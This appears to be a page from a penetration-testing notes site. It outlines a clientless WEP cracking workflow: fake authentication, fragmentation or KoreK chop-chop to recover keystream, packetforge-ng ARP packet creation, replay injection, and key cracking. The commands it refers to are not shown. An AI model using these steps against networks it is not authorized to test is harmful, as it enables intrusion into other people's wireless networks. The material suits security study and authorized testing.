WEP Attack (OPEN) - Clientless
This attack uses packetforge-ng to "forge" a packet that can be used to replay against AP collecting enough IV to crack the password.
1. Fake authentication attack (MAC association)
Similarly to scenario of WEP attack with Clients connected. Perform a Fake authentication attack to associate with AP (refer to the 1st step of WEP attack guide link below)
pageWEP Attack (OPEN) - Clients connected2. Fragmentation attack / Korek Chop Chop
Both methods can lead us subsequently create the ARP injection packet that we can later use in replaying the request to AP (to gather enough IV which in turn can let us crack the WEP)
(i) Fragmentation
fragmentation attack does not obtain WEP key, but obtains PRGA key stream of packets - PRGA can be used to generate packets with packetforge-ng. Generate packets for injection attacks.
(ii) Korek Chop Chop
Korek chop chop attack can decrypt WEP packet without knowing the key. Recovery of key stream for a given packet, to allow us to decrypt previous or future packets with equal or less length of same IV. This allow us to generate our own new packets for injection without the WEP key.
We can also use korek chop chop for various things:
decrypt interesting packets
forge snmp packets
blind port scan of the network
create arp request to accelerate IV
To perform Korek Chop chop attack use the below command. Once receive a packet enter 'y'
Now check the contents of the captured packet to discover what is the IP scheme of the network
3. Packetforge-ng create Injection packets
Creates encrypted packets which later be used for injection. PRGA we got previously is used to encrypt packets by packetforge-ng.
4. Inject Packets to network (aireplay Interactive mode)
Select 'y' to send packet to AP. Now the 'data' count is rapidly increasing, this attack continues in WEP attack where client is connected scenario.
5. Cracking WEP password
Last updated